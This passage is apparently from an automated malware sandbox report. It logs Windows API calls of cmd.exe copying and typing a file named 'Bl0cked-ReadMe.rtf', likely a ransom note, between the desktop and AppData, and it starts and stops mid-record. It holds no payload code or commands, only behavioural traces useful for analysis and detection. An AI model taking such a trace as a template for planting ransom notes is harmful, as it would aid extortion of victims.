"c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f760, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0134.399] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0134.399] GetConsoleTitleW (in: lpConsoleTitle=0x16f590, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.399] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0134.399] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0134.399] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0134.399] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0134.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.400] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f0f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f0f4) returned 0x1d0e88 [0134.400] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0134.400] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0134.400] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0134.401] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e000, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0134.401] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0134.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.401] GetFileType (hFile=0x54) returned 0x1 [0134.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.401] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e058 | out: lpFileSizeHigh=0x16e058*=0x0) returned 0x1632 [0134.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.401] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.401] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.401] GetFileType (hFile=0x4c) returned 0x1 [0134.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.401] GetFileType (hFile=0x4c) returned 0x1 [0134.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.401] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.404] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.404] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.405] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.405] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.406] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.406] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.408] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.408] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.409] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.409] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.410] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.410] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] WriteFile (in: 